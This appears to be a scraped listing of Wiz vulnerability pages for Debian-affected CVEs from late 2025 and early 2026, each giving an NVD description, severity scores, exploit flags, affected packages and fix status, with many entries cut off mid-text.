security: Restrict CONFIG_ZERO_CALL_USED_REGS to gcc or clang > 15.0.6
A bad bug in clang's implementation of -fzero-call-used-regs can result
in NULL pointer dereferences (see the links above the check for more
information). Restrict CONFIG_CC_HAS_ZERO_CALL_USED_REGS to either a
supported GCC version or a clang newer than 15.0.6, which will catch
both a theoretical 15.0.7 and the upcoming 16.0.0, which will both have
the bug fixed.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2025-71241 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-71241 [MEDIUM] CVE-2025-71241 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71241 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.3.6, 4.2.17, and 4.1.20 allows Cross-Site Scripting (XSS) in the private area. The content of the error message displayed by the 'transmettre' API is not properly sanitized, allowing an attacker to inject malicious scripts. This vulnerability is mitigated by the SPIP security screen.
Source : NVD
## 4.8
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Feb 20, 2026
Wiz
CVE-2025-52582 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2025-52582 [HIGH] CVE-2025-52582 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-52582 :
Linux Debian vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the Overlay::GrabOverlayFromPixelData functionality of Grassroot DICOM 3.024. A specially crafted DICOM file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.
Source : NVD
## 7.5
Score
Published December 16, 2025
Severity HIGH
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity HIGH No Fix
Wiz
CVE-2024-38798 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2024-38798 [MEDIUM] CVE-2024-38798 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2024-38798 :
Linux Debian vulnerability analysis and mitigation
EDK2 contains a vulnerability in BIOS where an attacker may cause “Exposure of Sensitive Information to an Unauthorized Actor” by local access. Successful exploitation of this vulnerability will lead to
possible information disclosure or escalation of privilege
and impact Confidentiality.
Source : NVD
## 5.8
Score
Published December 9, 2025
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
edk2-debuginfo
edk2-ovmf
Sources
NVD
Debian 11, 14 No Fix Added at: Dec
Wiz
CVE-2022-50753 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2022-50753 CVE-2022-50753 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50753 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to do sanity check on summary info
As Wenqing Liu reported in bugzilla:
https://bugzilla.kernel.org/show_bug.cgi?id=216456
BUG: KASAN: use-after-free in recover_data+0x63ae/0x6ae0 [f2fs]
Read of size 4 at addr ffff8881464dcd80 by task mount/1013
CPU: 3 PID: 1013 Comm: mount Tainted: G W 6.0.0-rc4 #1
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014
Call Trace:
dump_stack_lvl+0x45/0x5e
print_report.cold+0xf3/0x68d
kasan_report+0xa8/0x130
recover_data+0x63ae/0x6ae0 [f2fs]
f2fs_recover_fsync_data+0x120d/0x1fc0 [f2fs]
f2fs_fill_super+0x4665/0x61e0 [f2fs]
mount_bdev+0x2cf/0x3b0
legacy_get_tree+0xed/0x1d0
vfs_get_tr
Wiz
CVE-2026-23041 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23041 CVE-2026-23041 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23041 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Fix NULL pointer crash in bnxt_ptp_enable during error cleanup
When bnxt_init_one() fails during initialization (e.g.,
bnxt_init_int_mode returns -ENODEV), the error path calls
bnxt_free_hwrm_resources() which destroys the DMA pool and sets
bp->hwrm_dma_pool to NULL. Subsequently, bnxt_ptp_clear() is called,
which invokes ptp_clock_unregister().
Since commit a60fc3294a37 ("ptp: rework ptp_clock_unregister() to
disable events"), ptp_clock_unregister() now calls
ptp_disable_all_events(), which in turn invokes the driver's .enable()
callback (bnxt_ptp_enable()) to disable PTP events before completing the
unregistration.
bnxt_ptp_enable() att
Wiz
CVE-2025-68462 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.2
CVE-2025-68462 [LOW] CVE-2025-68462 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68462 :
Linux Debian vulnerability analysis and mitigation
Freedombox before 25.17.1 does not set proper permissions for the backups-data directory, allowing the reading of dump files of databases.
Source : NVD
## 3.2
Score
Published December 18, 2025
Severity LOW
CNA Score 3.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
freedombox
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 13, 14 Severity LOW Has Fix Added at: Dec 18, 2025
Echo Severity LOW Has Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prior
Wiz
CVE-2025-67859 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-67859 [MEDIUM] CVE-2025-67859 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67859 :
Linux Debian vulnerability analysis and mitigation
A Improper Authentication vulnerability in TLP allows local users to arbitrarily control the power
profile in use as well as the daemon’s log settings.This issue affects TLP: from 1.9 before 1.9.1.
Source : NVD
## 5.1
Score
Published January 14, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tlp
Sources
NVD
Debian 14 Has Fix Added at: Jan 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not ju
Wiz
CVE-2026-0989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-0989 [LOW] CVE-2026-0989 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0989 :
Linux Debian vulnerability analysis and mitigation
A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.
Source : NVD
## 3.7
Score
Published January 15, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and
Wiz
CVE-2018-25154 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2018-25154 [HIGH] CVE-2018-25154 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2018-25154 :
Linux Debian vulnerability analysis and mitigation
GNU Barcode 0.99 contains a buffer overflow vulnerability in its code 93 encoding process that allows attackers to trigger memory corruption. Attackers can exploit boundary errors during input file processing to potentially execute arbitrary code on the affected system.
Source : NVD
## 8.5
Score
Published December 24, 2025
Severity HIGH
CNA Score 8.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
barcode
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Dec 26, 2025
Echo Severity CRI
Wiz
CVE-2025-59024 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2025-59024 [MEDIUM] CVE-2025-59024 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59024 :
Linux Debian vulnerability analysis and mitigation
Crafted delegations or IP fragments can poison cached delegations in Recursor.
Source : NVD
## 6.5
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.22, edge Severity MEDIUM Has Fix Added at: Oct 23, 2025
Alpine 3.23 Severity MEDIUM Has Fix Added at: Dec 04, 2025
Debian 11, 12 Severity MEDIUM No Fix Added at: Oct 23, 2025
Debian 13, 14 Severity MEDIUM Has Fix Added at: Oct 23, 2025
Echo Severi
Wiz
CVE-2026-5704 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5704 [MEDIUM] CVE-2026-5704 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5704 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in tar. A remote attacker could exploit this vulnerability by crafting a malicious archive, leading to hidden file injection with fully attacker-controlled content. This bypasses pre-extraction inspection mechanisms, potentially allowing an attacker to introduce malicious files onto a system without detection.
Source : NVD
## 5
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
tar
Sources
NVD
Debian 11, 12, 13, 14 Sever
Wiz
CVE-2023-54147 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54147 [MEDIUM] CVE-2023-54147 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54147 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
media: platform: mtk-mdp3: Add missing check and free for ida_alloc
Add the check for the return value of the ida_alloc in order to avoid
NULL pointer dereference.
Moreover, free allocated "ctx->id" if mdp_m2m_open fails later in order
to avoid memory leak.
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-gcp-fips
linux
Sources
NVD
Debian 12, 13, 14 Has Fix Added at:
Wiz
CVE-2026-2641 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2641 [MEDIUM] CVE-2026-2641 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2641 :
Linux Debian vulnerability analysis and mitigation
A weakness has been identified in universal-ctags ctags up to 6.2.1. The affected element is the function parseExpression/parseExprList of the file parsers/v.c of the component V Language Parser. Executing a manipulation can lead to uncontrolled recursion. It is possible to launch the attack on the local host. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exp
Wiz
CVE-2025-67480 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67480 [MEDIUM] CVE-2025-67480 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67480 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/Api/ApiQueryRevisionsBase.Php.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Echo Has Fix Added at: Dec 12, 2025
## Get a CVE risk assessment
Get a prioritized view of C
Wiz
CVE-2026-3195 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-3195 [MEDIUM] CVE-2026-3195 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3195 :
Linux Debian vulnerability analysis and mitigation
two potential OOB memory accesses in virtio-snd
Source : NVD
Published March 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
qemu
Sources
NVD
Debian 13 Severity MEDIUM No Fix Added at: Mar 03, 2026
Debian 14 Has Fix Added at: Mar 03, 2026
Ubuntu 24.04, 25.10 Severity MEDIUM No Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulne
Wiz
CVE-2026-4359 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4359 [MEDIUM] CVE-2026-4359 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4359 :
Linux Debian vulnerability analysis and mitigation
A compromised third party cloud server or man-in-the-middle attacker could send a malformed HTTP response and cause a crash in applications using the MongoDB C driver.
Source : NVD
## 2
Score
Published March 17, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libbson
mongo-c-driver-debuginfo
Sources
NVD
Debian 11, 12, 13 Severity LOW No Fix Added at: Mar 17, 2026
Debian 14 Severity LOW Has Fix Added at: Mar 17, 2026
Echo Severity LOW No Fix Added at: Mar 17
Wiz
CVE-2025-40335 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-40335 [MEDIUM] CVE-2025-40335 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40335 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: validate userq input args
This will help on validating the userq input args, and
rejecting for the invalid userq request at the IOCTLs
first place.
Source : NVD
## 5.1
Score
Published December 9, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-nvidia
linux-oem-6.14
Sources
NVD
Debian 11, 12, 13 No Fix Added at: Dec 09, 2025
Debian 14 Has Fix Added at: Dec 09, 2025
Ech
Wiz
CVE-2026-23338 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23338 [MEDIUM] CVE-2026-23338 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23338 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/userq: Do not allow userspace to trivially triger kernel warnings
Userspace can either deliberately pass in the too small num_fences, or the
required number can legitimately grow between the two calls to the userq
wait ioctl. In both cases we do not want the emit the kernel warning
backtrace since nothing is wrong with the kernel and userspace will simply
get an errno reported back. So lets simply drop the WARN_ONs.
(cherry picked from commit 2c333ea579de6cc20ea7bc50e9595ef72863e65c)
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
C
Wiz
CVE-2025-53619 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.4
CVE-2025-53619 [HIGH] CVE-2025-53619 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-53619 :
Linux Debian vulnerability analysis and mitigation
null_convert
Source : NVD
## 9.1
Score
Published December 16, 2025
Severity CRITICAL
CNA Score 7.4
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
gdcm
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 18, 2025
Debian 14 Severity CRITICAL No Fix Added at: Dec 18, 2025
Echo Severity CRITICAL No Fix Added at: Dec 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux
Wiz
CVE-2025-6593 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2025-6593 [LOW] CVE-2025-6593 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6593 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files includes/user/User.Php.
This issue affects MediaWiki: from 1.27.0 before 1.39.13, 1.42.7 1.43.2, 1.44.0.
Source : NVD
## 2.1
Score
Published February 2, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Has Fix Added at: Jul 03, 2025
Debian 14 Has Fix Added at: Aug 10, 2025
Echo Has Fix Added at: Nov 18, 2025
## Get a CVE risk
Wiz
CVE-2026-21880 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21880 [MEDIUM] CVE-2026-21880 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21880 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below have an LDAP Injection vulnerability in the LDAP authentication mechanism. User-supplied input is directly substituted into LDAP search filters without proper sanitization, allowing attackers to enumerate all LDAP users, discover sensitive user attributes, and perform targeted attacks against specific accounts. This issue is fixed in version 1.2.49.
Source : NVD
## 5.3
Score
Published January 8, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.9
Ex
Wiz
CVE-2026-5201 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-5201 [MEDIUM] CVE-2026-5201 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-5201 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.
Source : NVD
## 7.5
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 30.6
Exploitation Probab
Wiz
CVE-2025-58150 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-58150 [HIGH] CVE-2025-58150 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-58150 :
Linux Debian vulnerability analysis and mitigation
Shadow mode tracing code uses a set of per-CPU variables to avoid
cumbersome parameter passing. Some of these variables are written to
with guest controlled data, of guest controllable size. That size can
be larger than the variable, and bounding of the writes was missing.
Source : NVD
## 8.8
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
xen-debuginfo
xen-devel
Sources
NVD
Alpine 3.20, 3.21, 3.22, 3.23, edge Severity HIGH Has Fi
Wiz
CVE-2026-2436 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-2436 [MEDIUM] CVE-2026-2436 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2436 :
Linux Debian vulnerability analysis and mitigation
soup_server_disconnect()
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libsoup
libsoup3
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 12, 2026
Echo Severity MEDIUM No Fix Added at: Mar 13, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 11, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not
Wiz
CVE-2025-66048 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-66048 [CRITICAL] CVE-2025-66048 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66048 :
Linux Debian vulnerability analysis and mitigation
Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 133
Source : NVD
## 9.8
Score
Published December 11, 2025
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 35.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
biosig
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Dec 12,
Wiz
CVE-2025-71158 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71158 [MEDIUM] CVE-2025-71158 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71158 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: mpsse: ensure worker is torn down
When an IRQ worker is running, unplugging the device would cause a
crash. The sealevel hardware this driver was written for was not
hotpluggable, so I never realized it.
This change uses a spinlock to protect a list of workers, which
it tears down on disconnect.
Source : NVD
## 5.5
Score
Published January 23, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libra
Wiz
CVE-2025-43904 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.2
CVE-2025-43904 [MEDIUM] CVE-2025-43904 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-43904 :
Linux Debian vulnerability analysis and mitigation
In SchedMD Slurm before 24.11.5, 24.05.8, and 23.11.11, the accounting system can allow a Coordinator to promote a user to Administrator.
Source : NVD
## 4.2
Score
Published January 16, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
slurm_22_05-auth-none
slurm_22_05-node
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Jul 08, 2025
Debian 12, 13 Severity MEDIUM Has Fix Added at: Jul 08, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Wiz
CVE-2025-11175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2025-11175 [HIGH] CVE-2025-11175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-11175 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') vulnerability in The Wikimedia Foundation Mediawiki - DiscussionTools Extension allows Regular Expression Exponential Blowup.This issue affects Mediawiki - DiscussionTools Extension: 1.44, 1.43.
Source : NVD
## 8.8
Score
Published January 30, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 03, 2025
Wiz
CVE-2025-68460 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-68460 [HIGH] CVE-2025-68460 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68460 :
Linux Debian vulnerability analysis and mitigation
Roundcube Webmail before 1.5.12 and 1.6 before 1.6.12 is prone to a information disclosure vulnerability in the HTML style sanitizer.
Source : NVD
## 7.5
Score
Published December 18, 2025
Severity HIGH
CNA Score 7.2
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH Has Fix Added at: Dec 18, 2025
Echo Severity HIGH Has Fix Added at: Dec 21, 2025
Ubuntu 25.04, 25.10 Severity MEDIUM No Fix Added at: Jan 11, 2026
## Get
Wiz
CVE-2025-14369 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-14369 [MEDIUM] CVE-2025-14369 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14369 :
Linux Debian vulnerability analysis and mitigation
dr_flac, an audio decoder within the dr_libs toolset, contains an integer overflow vulnerability flaw due to trusting the totalPCMFrameCount field from FLAC metadata before calculating buffer size, allowing an attacker with a specially crafted file to perform DoS against programs using the tool.
Source : NVD
## 5.5
Score
Published January 20, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libchdr
libsdl2-mixer
Sources
NVD
Debian 11, 12 Severity LOW No Fix
Wiz
CVE-2025-68763 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68763 [MEDIUM] CVE-2025-68763 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68763 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
crypto: starfive - Correctly handle return of sg_nents_for_len
The return value of sg_nents_for_len was assigned to an unsigned long
in starfive_hash_digest, causing negative error codes to be converted
to large positive integers.
Add error checking for sg_nents_for_len and return immediately on
failure to prevent potential buffer overflows.
Source : NVD
Published January 5, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.5
Exploitation Probability (EPSS) N/A
Affected packages and
Wiz
CVE-2026-23132 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
